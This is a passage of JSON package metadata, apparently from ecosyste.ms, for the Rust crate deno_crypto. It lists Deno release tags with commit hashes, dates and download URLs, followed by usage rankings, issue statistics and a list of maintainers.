2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-28T19:52:14.296Z","dependent_packages_count":21,"downloads":965176,"downloads_period":"total","dependent_repos_count":53,"rankings":{"downloads":4.2596470236314685,"dependent_repos_count":4.1929693343305905,"dependent_packages_count":1.9325008790896374,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":2.8697934868619583},"purl":"pkg:cargo/deno_crypto","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_crypto","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_crypto","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_crypto/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-28T02:34:50.351Z","issues_count":6619,"pull_requests_count":9639,"avg_time_to_close_issue":17209143.875658587,"avg_time_to_close_pull_request":1533351.1008099688,"issues_closed_count":3794,"pull_requests_closed_count":8024,"pull_request_authors_count":580,"issue_authors_count":2470,"avg_comments_per_issue":2.509442513974921,"avg_comments_per_pull_request":0.719680464778504,"merged_pull_requests_count":7006,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":663,"past_year_pull_requests_count":1197,"past_year_avg_time_to_close_issue":1426984.6098654708,"past_year_avg_time_to_close_pull_request":1334468.010687023,"past_year_issues_closed_count":223,"past_year_pull_requests_closed_count":655,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":365,"past_year_avg_comments_per_issue":1.2428355957767723,"past_year_avg_comments_per_pull_request":1.1161236424394319,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":483,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1795,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":391,"url":"https://issues.